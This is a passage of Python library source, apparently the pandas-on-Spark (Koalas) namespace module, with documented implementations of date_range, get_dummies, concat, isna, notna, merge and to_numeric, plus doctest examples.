3 3/11/2000
4 3/12/2000
dtype: object
>>> import timeit
>>> timeit.timeit(
... lambda: repr(pp.to_datetime(s, infer_datetime_format=True)),
... number = 1) # doctest: +SKIP
0.35832712500000063
>>> timeit.timeit(
... lambda: repr(pp.to_datetime(s, infer_datetime_format=False)),
... number = 1) # doctest: +SKIP
0.8895321660000004
Using a unix epoch time
>>> pp.to_datetime(1490195805, unit='s')
Timestamp('2017-03-22 15:16:45')
>>> pp.to_datetime(1490195805433502912, unit='ns')
Timestamp('2017-03-22 15:16:45.433502912')
Using a non-unix epoch origin
>>> pp.to_datetime([1, 2, 3], unit='D', origin=pd.Timestamp('1960-01-01'))
DatetimeIndex(['1960-01-02', '1960-01-03', '1960-01-04'], dtype='datetime64[ns]', freq=None)
"""
def pandas_to_datetime(pser_or_pdf) -> Series[np.datetime64]:
if isinstance(pser_or_pdf, pd.DataFrame):
pser_or_pdf = pser_or_pdf[["year", "month", "day"]]
return pd.to_datetime(
pser_or_pdf,
errors=errors,
format=format,
unit=unit,
infer_datetime_format=infer_datetime_format,
origin=origin,
)
if isinstance(arg, Series):
return arg.koalas.transform_batch(pandas_to_datetime)
if isinstance(arg, DataFrame):
kdf = arg[["year", "month", "day"]]
return kdf.koalas.transform_batch(pandas_to_datetime)
return pd.to_datetime(
arg,
errors=errors,
format=format,
unit=unit,
infer_datetime_format=infer_datetime_format,
origin=origin,
)
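# Hedged usage sketch (not part of the module): assembling datetimes from a Koalas
# DataFrame's year/month/day columns, mirroring the docstring example above.
def _example_to_datetime_sketch():
    kdf = pp.DataFrame({"year": [2015, 2016], "month": [2, 3], "day": [4, 5]})
    return to_datetime(kdf)  # Series of dtype datetime64[ns]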
def date_range(
start=None,
end=None,
periods=None,
freq=None,
tz=None,
normalize=False,
name=None,
closed=None,
**kwargs
) -> DatetimeIndex:
"""
Return a fixed frequency DatetimeIndex.
Parameters
----------
start : str or datetime-like, optional
Left bound for generating dates.
end : str or datetime-like, optional
Right bound for generating dates.
periods : int, optional
Number of periods to generate.
freq : str or DateOffset, default 'D'
Frequency strings can have multiples, e.g. '5H'.
tz : str or tzinfo, optional
Time zone name for returning localized DatetimeIndex, for example
'Asia/Hong_Kong'. By default, the resulting DatetimeIndex is
timezone-naive.
normalize : bool, default False
Normalize start/end dates to midnight before generating date range.
name : str, default None
Name of the resulting DatetimeIndex.
closed : {None, 'left', 'right'}, optional
Make the interval closed with respect to the given frequency to
the 'left', 'right', or both sides (None, the default).
**kwargs
For compatibility. Has no effect on the result.
Returns
-------
rng : DatetimeIndex
See Also
--------
DatetimeIndex : An immutable container for datetimes.
Notes
-----
Of the four parameters ``start``, ``end``, ``periods``, and ``freq``,
exactly three must be specified. If ``freq`` is omitted, the resulting
``DatetimeIndex`` will have ``periods`` linearly spaced elements between
``start`` and ``end`` (closed on both sides).
To learn more about the frequency strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases>`__.
Examples
--------
**Specifying the values**
The next four examples generate the same `DatetimeIndex`, but vary
the combination of `start`, `end` and `periods`.
Specify `start` and `end`, with the default daily frequency.
>>> pp.date_range(start='1/1/2018', end='1/08/2018') # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',
'2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],
dtype='datetime64[ns]', freq=None)
Specify `start` and `periods`, the number of periods (days).
>>> pp.date_range(start='1/1/2018', periods=8) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-04',
'2018-01-05', '2018-01-06', '2018-01-07', '2018-01-08'],
dtype='datetime64[ns]', freq=None)
Specify `end` and `periods`, the number of periods (days).
>>> pp.date_range(end='1/1/2018', periods=8) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-12-25', '2017-12-26', '2017-12-27', '2017-12-28',
'2017-12-29', '2017-12-30', '2017-12-31', '2018-01-01'],
dtype='datetime64[ns]', freq=None)
Specify `start`, `end`, and `periods`; the frequency is generated
automatically (linearly spaced).
>>> pp.date_range(
... start='2018-04-24', end='2018-04-27', periods=3
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-04-24 00:00:00', '2018-04-25 12:00:00',
'2018-04-27 00:00:00'],
dtype='datetime64[ns]', freq=None)
**Other Parameters**
Changed the `freq` (frequency) to ``'M'`` (month end frequency).
>>> pp.date_range(start='1/1/2018', periods=5, freq='M') # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-31', '2018-02-28', '2018-03-31', '2018-04-30',
'2018-05-31'],
dtype='datetime64[ns]', freq=None)
Multiples are allowed
>>> pp.date_range(start='1/1/2018', periods=5, freq='3M') # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',
'2019-01-31'],
dtype='datetime64[ns]', freq=None)
`freq` can also be specified as an Offset object.
>>> pp.date_range(
... start='1/1/2018', periods=5, freq=pd.offsets.MonthEnd(3)
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2018-01-31', '2018-04-30', '2018-07-31', '2018-10-31',
'2019-01-31'],
dtype='datetime64[ns]', freq=None)
`closed` controls whether to include `start` and `end` that are on the
boundary. The default includes boundary points on either end.
>>> pp.date_range(
... start='2017-01-01', end='2017-01-04', closed=None
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03', '2017-01-04'],
dtype='datetime64[ns]', freq=None)
Use ``closed='left'`` to exclude `end` if it falls on the boundary.
>>> pp.date_range(
... start='2017-01-01', end='2017-01-04', closed='left'
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-01-01', '2017-01-02', '2017-01-03'], dtype='datetime64[ns]', freq=None)
Use ``closed='right'`` to exclude `start` if it falls on the boundary.
>>> pp.date_range(
... start='2017-01-01', end='2017-01-04', closed='right'
... ) # doctest: +NORMALIZE_WHITESPACE
DatetimeIndex(['2017-01-02', '2017-01-03', '2017-01-04'], dtype='datetime64[ns]', freq=None)
"""
assert freq not in ["N", "ns"], "nanoseconds is not supported"
assert tz is None, "Localized DatetimeIndex is not supported"
return cast(
DatetimeIndex,
pp.from_pandas(
pd.date_range(
start=start,
end=end,
periods=periods,
freq=freq,
tz=tz,
normalize=normalize,
name=name,
closed=closed,
**kwargs
)
),
)
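# Hedged usage sketch (not part of the module): five month-end dates, equivalent to the
# 'M' frequency example in the docstring above.
def _example_date_range_sketch():
    return date_range(start="1/1/2018", periods=5, freq="M")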
def get_dummies(
data,
prefix=None,
prefix_sep="_",
dummy_na=False,
columns=None,
sparse=False,
drop_first=False,
dtype=None,
) -> DataFrame:
"""
Convert categorical variable into dummy/indicator variables, also
known as one hot encoding.
Parameters
----------
data : array-like, Series, or DataFrame
prefix : string, list of strings, or dict of strings, default None
String to append DataFrame column names.
Pass a list with length equal to the number of columns
when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
prefix_sep : string, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix.`
dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
columns : list-like, default None
Column names in the DataFrame to be encoded.
If `columns` is None then all the columns with
`object` or `category` dtype will be converted.
sparse : bool, default False
        Whether the dummy-encoded columns should be backed by
a :class:`SparseArray` (True) or a regular NumPy array (False).
In Koalas, this value must be "False".
drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
dtype : dtype, default np.uint8
Data type for new columns. Only a single dtype is allowed.
Returns
-------
dummies : DataFrame
See Also
--------
Series.str.get_dummies
Examples
--------
>>> s = pp.Series(list('abca'))
>>> pp.get_dummies(s)
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
>>> df = pp.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],
... 'C': [1, 2, 3]},
... columns=['A', 'B', 'C'])
>>> pp.get_dummies(df, prefix=['col1', 'col2'])
C col1_a col1_b col2_a col2_b col2_c
0 1 1 0 0 1 0
1 2 0 1 1 0 0
2 3 1 0 0 0 1
>>> pp.get_dummies(pp.Series(list('abcaa')))
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
4 1 0 0
>>> pp.get_dummies(pp.Series(list('abcaa')), drop_first=True)
b c
0 0 0
1 1 0
2 0 1
3 0 0
4 0 0
>>> pp.get_dummies(pp.Series(list('abc')), dtype=float)
a b c
0 1.0 0.0 0.0
1 0.0 1.0 0.0
2 0.0 0.0 1.0
"""
if sparse is not False:
raise NotImplementedError("get_dummies currently does not support sparse")
if columns is not None:
if not is_list_like(columns):
raise TypeError("Input must be a list-like for parameter `columns`")
if dtype is None:
dtype = "byte"
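        # Spark has no unsigned integer types, so the pandas default of np.uint8 is
        # mapped to Spark's ByteType ("byte") here.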
if isinstance(data, Series):
if prefix is not None:
prefix = [str(prefix)]
kdf = data.to_frame()
column_labels = kdf._internal.column_labels
remaining_columns = []
else:
if isinstance(prefix, str):
raise NotImplementedError(
"get_dummies currently does not support prefix as string types"
)
kdf = data.copy()
if columns is None:
column_labels = [
label
for label in kdf._internal.column_labels
if isinstance(
kdf._internal.spark_type_for(label), _get_dummies_default_accept_types
)
]
else:
if is_name_like_tuple(columns):
column_labels = [
label
for label in kdf._internal.column_labels
if label[: len(columns)] == columns
]
if len(column_labels) == 0:
raise KeyError(name_like_string(columns))
if prefix is None:
prefix = [
str(label[len(columns):])
if len(label) > len(columns) + 1
else label[len(columns)]
if len(label) == len(columns) + 1
else ""
for label in column_labels
]
elif any(isinstance(col, tuple) for col in columns) and any(
not is_name_like_tuple(col) for col in columns
):
raise ValueError(
"Expected tuple, got {}".format(
type(set(col for col in columns if not is_name_like_tuple(col)).pop())
)
)
else:
column_labels = [
label
for key in columns
for label in kdf._internal.column_labels
if label == key or label[0] == key
]
if len(column_labels) == 0:
if columns is None:
return kdf
raise KeyError("{} not in index".format(columns))
if prefix is None:
prefix = [str(label) if len(label) > 1 else label[0] for label in column_labels]
column_labels_set = set(column_labels)
remaining_columns = [
(
kdf[label]
if kdf._internal.column_labels_level == 1
else kdf[label].rename(name_like_string(label))
)
for label in kdf._internal.column_labels
if label not in column_labels_set
]
if any(
not isinstance(kdf._internal.spark_type_for(label), _get_dummies_acceptable_types)
for label in column_labels
):
raise NotImplementedError(
"get_dummies currently only accept {} values".format(
", ".join([t.typeName() for t in _get_dummies_acceptable_types])
)
)
if prefix is not None and len(column_labels) != len(prefix):
raise ValueError(
"Length of 'prefix' ({}) did not match the length of "
"the columns being encoded ({}).".format(len(prefix), len(column_labels))
)
elif isinstance(prefix, dict):
prefix = [prefix[column_label[0]] for column_label in column_labels]
all_values = _reduce_spark_multi(
kdf._internal.spark_frame,
[F.collect_set(kdf._internal.spark_column_for(label)) for label in column_labels],
)
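    # all_values[i] now holds the distinct values of the i-th column to encode,
    # collected in a single Spark job via F.collect_set.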
for i, label in enumerate(column_labels):
values = all_values[i]
if isinstance(values, np.ndarray):
values = values.tolist()
values = sorted(values)
if drop_first:
values = values[1:]
def column_name(value):
if prefix is None or prefix[i] == "":
return value
else:
return "{}{}{}".format(prefix[i], prefix_sep, value)
for value in values:
remaining_columns.append(
(kdf[label].notnull() & (kdf[label] == value))
.astype(dtype)
.rename(column_name(value))
)
if dummy_na:
remaining_columns.append(kdf[label].isnull().astype(dtype).rename(column_name(np.nan)))
return kdf[remaining_columns]
# TODO: there are many parameters to implement and support. See pandas's pd.concat.
def concat(objs, axis=0, join="outer", ignore_index=False, sort=False) -> Union[Series, DataFrame]:
"""
Concatenate Koalas objects along a particular axis with optional set logic
along the other axes.
Parameters
----------
objs : a sequence of Series or DataFrame
Any None objects will be dropped silently unless
        they are all None, in which case a ValueError will be raised
axis : {0/'index', 1/'columns'}, default 0
The axis to concatenate along.
join : {'inner', 'outer'}, default 'outer'
How to handle indexes on other axis (or axes).
ignore_index : bool, default False
If True, do not use the index values along the concatenation axis. The
resulting axis will be labeled 0, ..., n - 1. This is useful if you are
concatenating objects where the concatenation axis does not have
meaningful indexing information. Note the index values on the other
axes are still respected in the join.
sort : bool, default False
Sort non-concatenation axis if it is not already aligned.
Returns
-------
object, type of objs
When concatenating all ``Series`` along the index (axis=0), a
``Series`` is returned. When ``objs`` contains at least one
``DataFrame``, a ``DataFrame`` is returned. When concatenating along
the columns (axis=1), a ``DataFrame`` is returned.
See Also
--------
Series.append : Concatenate Series.
DataFrame.join : Join DataFrames using indexes.
DataFrame.merge : Merge DataFrames by indexes or columns.
Examples
--------
>>> from pyspark.pandas.config import set_option, reset_option
>>> set_option("compute.ops_on_diff_frames", True)
Combine two ``Series``.
>>> s1 = pp.Series(['a', 'b'])
>>> s2 = pp.Series(['c', 'd'])
>>> pp.concat([s1, s2])
0 a
1 b
0 c
1 d
dtype: object
Clear the existing index and reset it in the result
by setting the ``ignore_index`` option to ``True``.
>>> pp.concat([s1, s2], ignore_index=True)
0 a
1 b
2 c
3 d
dtype: object
Combine two ``DataFrame`` objects with identical columns.
>>> df1 = pp.DataFrame([['a', 1], ['b', 2]],
... columns=['letter', 'number'])
>>> df1
letter number
0 a 1
1 b 2
>>> df2 = pp.DataFrame([['c', 3], ['d', 4]],
... columns=['letter', 'number'])
>>> df2
letter number
0 c 3
1 d 4
>>> pp.concat([df1, df2])
letter number
0 a 1
1 b 2
0 c 3
1 d 4
Combine ``DataFrame`` and ``Series`` objects with different columns.
>>> pp.concat([df2, s1])
letter number 0
0 c 3.0 None
1 d 4.0 None
0 None NaN a
1 None NaN b
Combine ``DataFrame`` objects with overlapping columns
and return everything. Columns outside the intersection will
be filled with ``None`` values.
>>> df3 = pp.DataFrame([['c', 3, 'cat'], ['d', 4, 'dog']],
... columns=['letter', 'number', 'animal'])
>>> df3
letter number animal
0 c 3 cat
1 d 4 dog
>>> pp.concat([df1, df3])
letter number animal
0 a 1 None
1 b 2 None
0 c 3 cat
1 d 4 dog
Sort the columns.
>>> pp.concat([df1, df3], sort=True)
animal letter number
0 None a 1
1 None b 2
0 cat c 3
1 dog d 4
Combine ``DataFrame`` objects with overlapping columns
and return only those that are shared by passing ``inner`` to
the ``join`` keyword argument.
>>> pp.concat([df1, df3], join="inner")
letter number
0 a 1
1 b 2
0 c 3
1 d 4
>>> df4 = pp.DataFrame([['bird', 'polly'], ['monkey', 'george']],
... columns=['animal', 'name'])
Combine with column axis.
>>> pp.concat([df1, df4], axis=1)
letter number animal name
0 a 1 bird polly
1 b 2 monkey george
>>> reset_option("compute.ops_on_diff_frames")
"""
if isinstance(objs, (DataFrame, IndexOpsMixin)) or not isinstance(
objs, Iterable
): # TODO: support dict
raise TypeError(
"first argument must be an iterable of Koalas "
"objects, you passed an object of type "
'"{name}"'.format(name=type(objs).__name__)
)
if len(cast(Sized, objs)) == 0:
raise ValueError("No objects to concatenate")
objs = list(filter(lambda obj: obj is not None, objs))
if len(objs) == 0:
raise ValueError("All objects passed were None")
for obj in objs:
if not isinstance(obj, (Series, DataFrame)):
            raise TypeError(
                "cannot concatenate object of type "
                "'{name}'; only pp.Series "
                "and pp.DataFrame are valid".format(name=type(obj).__name__)
            )
if join not in ["inner", "outer"]:
raise ValueError("Only can inner (intersect) or outer (union) join the other axis.")
axis = validate_axis(axis)
if axis == 1:
kdfs = [obj.to_frame() if isinstance(obj, Series) else obj for obj in objs]
level = min(kdf._internal.column_labels_level for kdf in kdfs)
kdfs = [
DataFrame._index_normalized_frame(level, kdf)
if kdf._internal.column_labels_level > level
else kdf
for kdf in kdfs
]
concat_kdf = kdfs[0]
column_labels = concat_kdf._internal.column_labels.copy()
kdfs_not_same_anchor = []
for kdf in kdfs[1:]:
duplicated = [label for label in kdf._internal.column_labels if label in column_labels]
if len(duplicated) > 0:
pretty_names = [name_like_string(label) for label in duplicated]
raise ValueError(
"Labels have to be unique; however, got duplicated labels %s." % pretty_names
)
column_labels.extend(kdf._internal.column_labels)
if same_anchor(concat_kdf, kdf):
concat_kdf = DataFrame(
concat_kdf._internal.with_new_columns(
[
concat_kdf._kser_for(label)
for label in concat_kdf._internal.column_labels
]
+ [kdf._kser_for(label) for label in kdf._internal.column_labels]
)
)
else:
kdfs_not_same_anchor.append(kdf)
if len(kdfs_not_same_anchor) > 0:
def resolve_func(kdf, this_column_labels, that_column_labels):
raise AssertionError("This should not happen.")
for kdf in kdfs_not_same_anchor:
if join == "inner":
concat_kdf = align_diff_frames(
resolve_func, concat_kdf, kdf, fillna=False, how="inner",
)
elif join == "outer":
concat_kdf = align_diff_frames(
resolve_func, concat_kdf, kdf, fillna=False, how="full",
)
concat_kdf = concat_kdf[column_labels]
if ignore_index:
concat_kdf.columns = list(map(str, _range(len(concat_kdf.columns))))
if sort:
concat_kdf = concat_kdf.sort_index()
return concat_kdf
# Series, Series ...
# We should return Series if objects are all Series.
should_return_series = all(map(lambda obj: isinstance(obj, Series), objs))
# DataFrame, Series ... & Series, Series ...
# In this case, we should return DataFrame.
new_objs = []
num_series = 0
series_names = set()
for obj in objs:
if isinstance(obj, Series):
num_series += 1
series_names.add(obj.name)
obj = obj.to_frame(DEFAULT_SERIES_NAME)
new_objs.append(obj)
objs = new_objs
column_labels_levels = set(obj._internal.column_labels_level for obj in objs)
if len(column_labels_levels) != 1:
raise ValueError("MultiIndex columns should have the same levels")
# DataFrame, DataFrame, ...
# All Series are converted into DataFrame and then compute concat.
if not ignore_index:
indices_of_kdfs = [kdf.index for kdf in objs]
index_of_first_kdf = indices_of_kdfs[0]
for index_of_kdf in indices_of_kdfs:
if index_of_first_kdf.names != index_of_kdf.names:
raise ValueError(
"Index type and names should be same in the objects to concatenate. "
"You passed different indices "
"{index_of_first_kdf} and {index_of_kdf}".format(
index_of_first_kdf=index_of_first_kdf.names, index_of_kdf=index_of_kdf.names
)
)
column_labels_of_kdfs = [kdf._internal.column_labels for kdf in objs]
if ignore_index:
index_names_of_kdfs = [[] for _ in objs] # type: List
else:
index_names_of_kdfs = [kdf._internal.index_names for kdf in objs]
if all(name == index_names_of_kdfs[0] for name in index_names_of_kdfs) and all(
idx == column_labels_of_kdfs[0] for idx in column_labels_of_kdfs
):
# If all columns are in the same order and values, use it.
kdfs = objs
else:
if join == "inner":
interested_columns = set.intersection(*map(set, column_labels_of_kdfs))
            # Keep the column order of the first DataFrame.
merged_columns = [
label for label in column_labels_of_kdfs[0] if label in interested_columns
]
# When multi-index column, although pandas is flaky if `join="inner" and sort=False`,
# always sort to follow the `join="outer"` case behavior.
if (len(merged_columns) > 0 and len(merged_columns[0]) > 1) or sort:
# FIXME: better ordering
merged_columns = sorted(merged_columns, key=name_like_string)
kdfs = [kdf[merged_columns] for kdf in objs]
elif join == "outer":
merged_columns = []
for labels in column_labels_of_kdfs:
merged_columns.extend(label for label in labels if label not in merged_columns)
assert len(merged_columns) > 0
if LooseVersion(pd.__version__) < LooseVersion("0.24"):
# Always sort when multi-index columns, and if there are Series, never sort.
sort = len(merged_columns[0]) > 1 or (num_series == 0 and sort)
else:
# Always sort when multi-index columns or there are more than two Series,
# and if there is only one Series, never sort.
sort = len(merged_columns[0]) > 1 or num_series > 1 or (num_series != 1 and sort)
if sort:
# FIXME: better ordering
merged_columns = sorted(merged_columns, key=name_like_string)
kdfs = []
for kdf in objs:
columns_to_add = list(set(merged_columns) - set(kdf._internal.column_labels))
# TODO: NaN and None difference for missing values. pandas seems filling NaN.
sdf = kdf._internal.resolved_copy.spark_frame
for label in columns_to_add:
sdf = sdf.withColumn(name_like_string(label), F.lit(None))
data_columns = kdf._internal.data_spark_column_names + [
name_like_string(label) for label in columns_to_add
]
kdf = DataFrame(
kdf._internal.copy(
spark_frame=sdf,
index_spark_columns=[
scol_for(sdf, col) for col in kdf._internal.index_spark_column_names
],
column_labels=(kdf._internal.column_labels + columns_to_add),
data_spark_columns=[scol_for(sdf, col) for col in data_columns],
data_dtypes=(kdf._internal.data_dtypes + ([None] * len(columns_to_add))),
)
)
kdfs.append(kdf[merged_columns])
if ignore_index:
sdfs = [kdf._internal.spark_frame.select(kdf._internal.data_spark_columns) for kdf in kdfs]
else:
sdfs = [
kdf._internal.spark_frame.select(
kdf._internal.index_spark_columns + kdf._internal.data_spark_columns
)
for kdf in kdfs
]
concatenated = reduce(lambda x, y: x.union(y), sdfs)
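    # The row-wise (axis=0) concatenation is a plain Spark UNION ALL of the aligned
    # frames; the alignment logic above guarantees that the selected columns of every
    # frame are in the same order before the union.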
if ignore_index:
index_spark_column_names = []
index_names = []
index_dtypes = []
else:
index_spark_column_names = kdfs[0]._internal.index_spark_column_names
index_names = kdfs[0]._internal.index_names
index_dtypes = kdfs[0]._internal.index_dtypes
result_kdf = DataFrame(
kdfs[0]._internal.copy(
spark_frame=concatenated,
index_spark_columns=[scol_for(concatenated, col) for col in index_spark_column_names],
index_names=index_names,
index_dtypes=index_dtypes,
data_spark_columns=[
scol_for(concatenated, col) for col in kdfs[0]._internal.data_spark_column_names
],
data_dtypes=None, # TODO: dtypes?
)
) # type: DataFrame
if should_return_series:
# If all input were Series, we should return Series.
if len(series_names) == 1:
name = series_names.pop()
else:
name = None
return first_series(result_kdf).rename(name)
else:
return result_kdf
def melt(frame, id_vars=None, value_vars=None, var_name=None, value_name="value") -> DataFrame:
return DataFrame.melt(frame, id_vars, value_vars, var_name, value_name)
melt.__doc__ = DataFrame.melt.__doc__
def isna(obj):
"""
Detect missing values for an array-like object.
This function takes a scalar or array-like object and indicates
whether values are missing (``NaN`` in numeric arrays, ``None`` or ``NaN``
in object arrays).
Parameters
----------
obj : scalar or array-like
Object to check for null or missing values.
Returns
-------
bool or array-like of bool
For scalar input, returns a scalar boolean.
For array input, returns an array of boolean indicating whether each
corresponding element is missing.
See Also
--------
Series.isna : Detect missing values in a Series.
Series.isnull : Detect missing values in a Series.
DataFrame.isna : Detect missing values in a DataFrame.
DataFrame.isnull : Detect missing values in a DataFrame.
Index.isna : Detect missing values in an Index.
Index.isnull : Detect missing values in an Index.
Examples
--------
Scalar arguments (including strings) result in a scalar boolean.
>>> pp.isna('dog')
False
>>> pp.isna(np.nan)
True
ndarrays result in an ndarray of booleans.
>>> array = np.array([[1, np.nan, 3], [4, 5, np.nan]])
>>> array
array([[ 1., nan, 3.],
[ 4., 5., nan]])
>>> pp.isna(array)
array([[False, True, False],
[False, False, True]])
For Series and DataFrame, the same type is returned, containing booleans.
>>> df = pp.DataFrame({'a': ['ant', 'bee', 'cat'], 'b': ['dog', None, 'fly']})
>>> df
a b
0 ant dog
1 bee None
2 cat fly
>>> pp.isna(df)
a b
0 False False
1 False True
2 False False
>>> pp.isnull(df.b)
0 False
1 True
2 False
Name: b, dtype: bool
"""
# TODO: Add back:
# notnull : Boolean inverse of pandas.isnull.
# into the See Also in the docstring. It does not find the method in the latest numpydoc.
if isinstance(obj, (DataFrame, Series)):
return obj.isnull()
else:
return pd.isnull(obj)
isnull = isna
def notna(obj):
"""
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. NA values, such as None or
:attr:`numpy.NaN`, get mapped to False values.
Returns
-------
bool or array-like of bool
Mask of bool values for each element that
indicates whether an element is not an NA value.
See Also
--------
isna : Detect missing values for an array-like object.
Series.notna : Boolean inverse of Series.isna.
DataFrame.notnull : Boolean inverse of DataFrame.isnull.
Index.notna : Boolean inverse of Index.isna.
Index.notnull : Boolean inverse of Index.isnull.
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pp.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notnull()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pp.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> pp.notna(ser)
0 True
1 True
2 False
dtype: bool
>>> pp.notna(ser.index)
True
"""
# TODO: Add back:
# Series.notnull :Boolean inverse of Series.isnull.
# DataFrame.notna :Boolean inverse of DataFrame.isna.
# into the See Also in the docstring. It does not find the method in the latest numpydoc.
if isinstance(obj, (DataFrame, Series)):
return obj.notna()
else:
return pd.notna(obj)
notnull = notna
def merge(
obj,
right: "DataFrame",
how: str = "inner",
on: Union[Any, List[Any], Tuple, List[Tuple]] = None,
left_on: Union[Any, List[Any], Tuple, List[Tuple]] = None,
right_on: Union[Any, List[Any], Tuple, List[Tuple]] = None,
left_index: bool = False,
right_index: bool = False,
suffixes: Tuple[str, str] = ("_x", "_y"),
) -> "DataFrame":
"""
Merge DataFrame objects with a database-style join.
The index of the resulting DataFrame will be one of the following:
- 0...n if no index is used for merging
- Index of the left DataFrame if merged only on the index of the right DataFrame
- Index of the right DataFrame if merged only on the index of the left DataFrame
- All involved indices if merged using the indices of both DataFrames
e.g. if `left` with indices (a, x) and `right` with indices (b, x), the result will
be an index (x, a, b)
Parameters
----------
right: Object to merge with.
how: Type of merge to be performed.
{'left', 'right', 'outer', 'inner'}, default 'inner'
left: use only keys from left frame, similar to a SQL left outer join; preserve key
order.
right: use only keys from right frame, similar to a SQL right outer join; preserve key
order.
outer: use union of keys from both frames, similar to a SQL full outer join; sort keys
lexicographically.
inner: use intersection of keys from both frames, similar to a SQL inner join;
preserve the order of the left keys.
on: Column or index level names to join on. These must be found in both DataFrames. If on
is None and not merging on indexes then this defaults to the intersection of the
columns in both DataFrames.
left_on: Column or index level names to join on in the left DataFrame. Can also
be an array or list of arrays of the length of the left DataFrame.
These arrays are treated as if they are columns.
right_on: Column or index level names to join on in the right DataFrame. Can also
be an array or list of arrays of the length of the right DataFrame.
These arrays are treated as if they are columns.
left_index: Use the index from the left DataFrame as the join key(s). If it is a
MultiIndex, the number of keys in the other DataFrame (either the index or a number of
columns) must match the number of levels.
right_index: Use the index from the right DataFrame as the join key. Same caveats as
left_index.
suffixes: Suffix to apply to overlapping column names in the left and right side,
respectively.
Returns
-------
DataFrame
A DataFrame of the two merged objects.
Examples
--------
>>> df1 = pp.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [1, 2, 3, 5]},
... columns=['lkey', 'value'])
>>> df2 = pp.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],
... 'value': [5, 6, 7, 8]},
... columns=['rkey', 'value'])
>>> df1
lkey value
0 foo 1
1 bar 2
2 baz 3
3 foo 5
>>> df2
rkey value
0 foo 5
1 bar 6
2 baz 7
3 foo 8
Merge df1 and df2 on the lkey and rkey columns. The value columns have
the default suffixes, _x and _y, appended.
>>> merged = pp.merge(df1, df2, left_on='lkey', right_on='rkey')
>>> merged.sort_values(by=['lkey', 'value_x', 'rkey', 'value_y']) # doctest: +ELLIPSIS
lkey value_x rkey value_y
...bar 2 bar 6
...baz 3 baz 7
...foo 1 foo 5
...foo 1 foo 8
...foo 5 foo 5
...foo 5 foo 8
>>> left_kdf = pp.DataFrame({'A': [1, 2]})
>>> right_kdf = pp.DataFrame({'B': ['x', 'y']}, index=[1, 2])
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True).sort_index()
A B
1 2 x
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True, how='left').sort_index()
A B
0 1 None
1 2 x
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True, how='right').sort_index()
A B
1 2.0 x
2 NaN y
>>> pp.merge(left_kdf, right_kdf, left_index=True, right_index=True, how='outer').sort_index()
A B
0 1.0 None
1 2.0 x
2 NaN y
Notes
-----
As described in #263, joining string columns currently returns None for missing values
instead of NaN.
"""
return obj.merge(
right,
how=how,
on=on,
left_on=left_on,
right_on=right_on,
left_index=left_index,
right_index=right_index,
suffixes=suffixes,
)
def to_numeric(arg):
"""
Convert argument to a numeric type.
Parameters
----------
arg : scalar, list, tuple, 1-d array, or Series
Returns
-------
ret : numeric if parsing succeeded.
See Also
--------
DataFrame.astype : Cast argument to a specified dtype.
to_datetime : Convert argument to datetime.
to_timedelta : Convert argument to timedelta.
numpy.ndarray.astype : Cast a numpy array to a specified type.
Examples
--------
>>> kser = pp.Series(['1.0', '2', '-3'])
>>> kser
0 1.0
1 2
2 -3
dtype: object
>>> pp.to_numeric(kser)
0 1.0
1 2.0
2 -3.0
dtype: float32
    If the given Series contains values that cannot be cast to float, they are cast to `np.nan`
>>> kser = pp.Series(['apple', '1.0', '2', '-3'])
>>> kser
0 apple
1 1.0
2 2
3 -3
dtype: object
>>> pp.to_numeric(kser)
0 NaN
1 1.0
2 2.0
3 -3.0
dtype: float32
    Lists, tuples, 1-d arrays, and scalars are also supported
>>> pp.to_numeric(['1.0', '2', '-3'])
array([ 1., 2., -3.])
>>> pp.to_numeric(('1.0', '2', '-3'))
array([ 1., 2., -3.])
>>> pp.to_numeric(np.array(['1.0', '2', '-3']))
array([ 1., 2., -3.])
>>> pp.to_numeric('1.0')
1.0
"""
if isinstance(arg, Series):
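        # A minimal cast-based implementation: the underlying Spark column is cast to
        # FloatType, which is why the examples above show dtype float32 and why
        # unparseable strings become null/NaN instead of raising as
        # pandas.to_numeric(errors='raise') would.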
return arg._with_new_scol(arg.spark.column.cast("float"))
else:
return pd.to_numeric(arg)
def broadcast(obj) -> DataFrame:
"""
Marks a DataFrame as small enough for use in broadcast joins.
Parameters
----------
obj : DataFrame
Returns
-------
ret : DataFrame with broadcast hint.
See Also
--------
DataFrame.merge : Merge DataFrame objects with a database-style join.
